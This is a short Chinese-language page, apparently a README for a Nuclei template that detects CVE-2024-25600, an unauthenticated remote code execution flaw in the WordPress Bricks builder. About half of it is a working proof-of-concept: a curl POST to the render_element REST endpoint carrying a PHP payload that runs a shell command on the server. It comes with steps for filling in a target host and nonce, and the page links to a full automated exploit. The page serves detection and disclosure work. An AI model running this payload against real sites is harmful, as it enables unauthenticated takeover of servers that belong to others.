关于CVE-2024-25600的Nuclei模板和PoC信息
WordPress的Bricks主题在所有版本(包括1.9.6)中存在远程代码执行漏洞。这使得未经身份验证的攻击者能够在服务器上执行代码。 此模板 🛠️ 旨在使用nuclei检测Bricks Builder插件中发现的CVE-2024-25600漏洞 🕳️。该漏洞允许对受影响的网站进行未经身份验证的远程代码执行 💻。
完整PoC(自动)可在以下地址获取:https://github.com/chocapikk/CVE-2024-25600。
披露提供的基础PoC如下:
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
"objectType": "post"
}
}
}
}'
将 [HOST] 替换为目标网站,[NONCE] 替换为从网站获取的nonce值。
有关CVE-2024-25600漏洞的更多信息,请参阅Snicco.io上的详细披露:Snicco.io。